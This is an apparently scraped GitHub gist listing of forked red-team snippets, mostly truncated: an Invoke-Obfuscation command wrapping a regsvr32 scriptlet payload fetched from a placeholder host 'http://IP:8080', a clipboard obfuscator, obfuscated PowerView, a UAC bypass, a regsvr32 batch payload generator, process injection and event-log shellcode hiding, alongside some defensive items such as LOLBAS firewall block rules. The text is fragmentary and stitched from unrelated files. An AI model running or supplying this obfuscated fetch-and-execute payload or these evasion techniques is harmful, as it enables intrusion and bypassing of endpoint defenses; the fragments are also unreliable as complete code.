
1. Macro Web_Delivery + Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
e.g.
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
@0xAJStrike
0xAJStrike / gist:6a7253ce664e30d28bd502cf449ef265
Created August 27, 2022 13:24 — forked from curi0usJack/gist:1eef9d94a01344bddafec7434412ec66
Obfuscate Command in your Clipboard (even if base64 encoded).
function obs()
{
Import-Module Invoke-Obfuscation
$s = Get-Clipboard
if ($s -eq $null)
{
Write-Host "Clipboard is null."
}
@0xAJStrike
0xAJStrike / Obfuscated-PowerView-Example.psm1
Created August 27, 2022 13:22 — forked from nullbind/Obfuscated-PowerView-Example.psm1
Obfuscated-PowerView-Example.psm1
function New-InMemoryModule
{
Param
(
[Parameter(Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$ModuleName = [Guid]::NewGuid().ToString()
)
@0xAJStrike
0xAJStrike / Test-AdDnsRR.ps1
Created August 27, 2022 13:22 — forked from JaekelEDV/Test-AdDnsRR.ps1
PowerShell script checking for AD-relevant DNS Resource Records in DNS
#This script checks if all AD-relevant SRV records exist in DNS. It also looks for netlogon.dns and the A record for the DC.
$Domain = (Get-ADDomain).DNSRoot
$DCName = (Get-ADDomainController).Name
$msdcs = (Get-DnsServerResourceRecord -ZoneName _msdcs.$Domain -RRType Srv)
$ARR = (Get-DnsServerResourceRecord -ZoneName $Domain -RRType A)
$PDC = [string] "_ldap._tcp.pdc"
$GC = [string] "_ldap._tcp.gc"
$KDC = [string] "_kerberos._tcp.dc"
$DC = [string] "_ldap._tcp.dc"
function Invoke-WScriptBypassUAC
{
<#
.SYNOPSIS
Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.
Author: @enigma0x3, @harmj0y, Vozzie
License: BSD 3-Clause
Required Dependencies: None
@0xAJStrike
0xAJStrike / New-RegSvr32BatchFile.ps1
Created June 30, 2022 17:42 — forked from xorrior/New-RegSvr32BatchFile.ps1
Generate a batch file to execute a dll with regsvr32
function New-RegSvr32BatchFile
{
<#
.SYNOPSIS
Generates a batch file which will contain a certutil encoded, cab compressed payload.
.DESCRIPTION
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
@0xAJStrike
0xAJStrike / Windows LOLBAS FW Block.md
Created June 30, 2022 17:41 — forked from rc-MikeDevens/Windows LOLBAS FW Block.md
Windows firewall rules to block LOLBAS

LOLBAS Firewall Block Rules

Many Windows binaries that can be abused by attackers to make undesired network connections do not need network connectivity for 'normal' functionality. With the Windows firewall, we can therefore create rules to block outbound network connections from these binaries as an additional layer of protection.

Note: Depending on your environment, these firewall rules may cause issues. Test before implementing.

These rules have been in place in my personal network without issue:

New-NetFirewallRule -DisplayName "regsvr32 block 1" -Group "LOLBAS Block" -Direction Outbound -Program "C:\Windows\System32\regsvr32.exe" -Action Block
@0xAJStrike
0xAJStrike / findhooks.cs
Created May 9, 2022 18:27
Find hooked APIs using C#
using System;
using System.Runtime.InteropServices;
/* References
* 1. https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions
* 2. https://github.com/Mr-Un1k0d3r/EDRs
*/
namespace SharpHookCheck
{
using System;
using System.Runtime.InteropServices;
using System.Text;
namespace SendMessageKernelCallback
{
/*References:
* 1. https://t0rchwo0d.github.io/windows/Windows-Process-Injection-Technique-KernelCallbackTable/
* 2. https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/
*/
@0xAJStrike
0xAJStrike / EventLogInject.cs
Created May 9, 2022 18:27
POC to inject and extract shellcode from Windows Event Logs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace HiddenEventLogs
{